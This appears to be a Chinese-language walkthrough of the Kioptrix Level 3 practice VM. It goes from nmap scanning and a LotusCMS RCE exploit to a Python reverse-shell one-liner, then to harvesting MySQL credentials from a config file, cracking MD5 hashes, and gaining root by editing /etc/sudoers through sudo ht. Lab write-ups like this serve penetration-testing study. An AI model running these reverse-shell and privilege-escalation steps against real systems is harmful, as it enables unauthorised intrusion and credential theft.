探测

nmap --min-rate 10000 -p- 192.168.128.134 最小速率10000

nmap -sT -sV -sC -O 192.168.128.134

web打点

无弱口令

暴露cms寻找exp

searchsploit LotusCMS -m 16982 [输入id号和参数m可以直接把东西复制到当前目录]

查看txt里面发现 都是xss没有rce

github搜索到一个rce 还是sh的

反弹shell

exp用法 url加cms的路径

./lotusRCE.sh 192.168.128.134/index.php

让我们输入reverse shell的ip 以及端口

nc -lvnp 4444 监听本机的4444端口

我们是nc弹的shell 输入1就行了

权限是www-data 就是网站权限

内网

uname -a 可以看是什么机器

dpkg -l 是查看机器上安装了那些东西 机器上有python

先把交互的shell改善一下 查一下python的反弹命令

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.128.128",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

成功反弹shell 但是我们不能clear 会很麻烦

clear 命令时，如果系统报告 TERM environment variable not set，这意味着 clear 无法确定它应该使用哪种控制序列来清除屏幕。不同的终端类型有不同的控制序列用于移动光标、清除屏幕等操作。clear 命令依赖于 TERM 环境变量来知道它正在与哪种类型的终端通信，从而发送正确的控制序列。

为什么import就能 clear 了？

1. 终端识别：clear 命令需要了解它是在什么类型的终端上运行的，以便能够正确地发送清除屏幕的命令。如果你没有设置 TERM 变量，clear 就不知道该发送哪些控制字符来完成这个任务。

2. 控制序列：每种终端类型都有自己的控制序列集，用来处理如清除屏幕、移动光标等操作。xterm-color 或 xterm-256color 是常见的终端类型，它们定义了一组标准的控制序列，clear 命令可以根据这些标准来工作。

3. 库支持：许多命令行工具，包括 clear，通常会通过一个叫做 terminfo（或更老的 termcap）的数据库来查找与特定 TERM 值关联的控制序列。当 TERM 被正确设置后，clear 可以查询这个数据库并找到如何在你的终端上执行清除操作。

4. 默认行为：大多数现代的终端模拟器都兼容 xterm，并且至少支持基本的 ANSI 控制序列。因此，将 TERM 设置为 xterm 或 xterm-256color 通常是安全的选择，可以确保大部分命令行工具正常工作，包括 clear。

export TERM=xterm-color 导入环境变量让 clear知道是那种终端【就可以clear了】

内网漫游

提权sudo

漫游就是翻机器里面的文件比如配置文件 【config】里面会记录很多敏感信息

ls -l 看当前目录下的文件 这是这个网站的源码文件

看了 modules data cache gallery

gallery文件下有配置文件

发现mysql的密码 和路径

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";$GLOBALS["gallarific_mysql_server"] = "localhost";$GLOBALS["gallarific_mysql_database"] = "gallery";$GLOBALS["gallarific_mysql_username"] = "root";$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

登录phpmuadmin

本来下连接mysql数据库的

根据之前的端口信息可以知道该机器是没有对外开放3306的

所以只能目标机器自己连接但是 这个地方不知道为什么 我一直连不上

但是用同样的密码 phpmyadmin倒是登录上去了 事半功倍

在gallery数据库中有两个 敏感表 account users 里面都有密码

users表

这个密码应该是gallery的用户的密码 之前漫游翻 gallery文件的时候有 一个gadmin

尝试访问 并登陆成功

有上传功能

accounts表

把hash拿去kali的 hash-identifier -h 识别一下 发现是md5

在线解密md5在线解密破解,md5解密加密

loneferret  starwars
dreg          Mast3r

但是我们不知道这是什么密码 accounts 是账户的意思 能连的 现在就mysql 主页面登录框 另一个发现的登录框

主页面的登录框我都试过 不对

现在只有ssh没有试过了 但是发现目标机器的ssh加密太老了

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss dreg@192.168.128.134

• -oHostKeyAlgorithms=ssh-rsa,ssh-dss: 使用 -oH 选项来设置配置参数。这里的 HostKeyAlgorithms 参数指定了客户端愿意接受的主机密钥算法列表。通过将 ssh-rsa 和 ssh-dss 添加到这个列表中，你允许客户端与只提供这些算法的服务器进行协商。

• dreg@192.168.128.134: 指定要连接的用户（dreg）和远程服务器的IP地址（192.168.128.134）。

提权

两个用户全部ssh登录成功

先尝试sudo提权 dreg用户不能 但是lonferret有sudo权限

直接sudo /urs/local/bin/ht 这个就是无密码使用sudo权限执行 的ht【一个linux编辑器】 f3进入

/etc/sudoers 文件是 Linux 系统中用于配置 sudo 命令权限的核心文件。它定义了哪些用户或用户组可以以超级用户（root）或其他用户的权限执行特定命令

如果在 sudoers 文件中为某个用户或用户组添加了 /bin/bash 的权限，这意味着该用户可以通过 sudo 启动一个具有超级用户权限的交互式 shell。这将允许他们执行任意命令，而不仅仅是你原本打算允许的特定命令

添加 /bin/bash

直接执行 sudo /bin/bash

大功告成

总结

searchsploit LotusCMS -m 16982【漏洞id】 很方便的把searchsploit的exp直接复制到到当前目录

uname -a查看机器信息

dpkg -l 查看当前软件 可以用grep 来过滤关键信息

根据提示来确定解决办法

export TERM=xterm-color 添加环境变量 命令行

ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss dreg@192.168.128.134 修改我们客户端的ssh配置符合 服务端的密钥配置

/etc/sudoers 定义用户可以执行那些权限

密码复用问题多尝试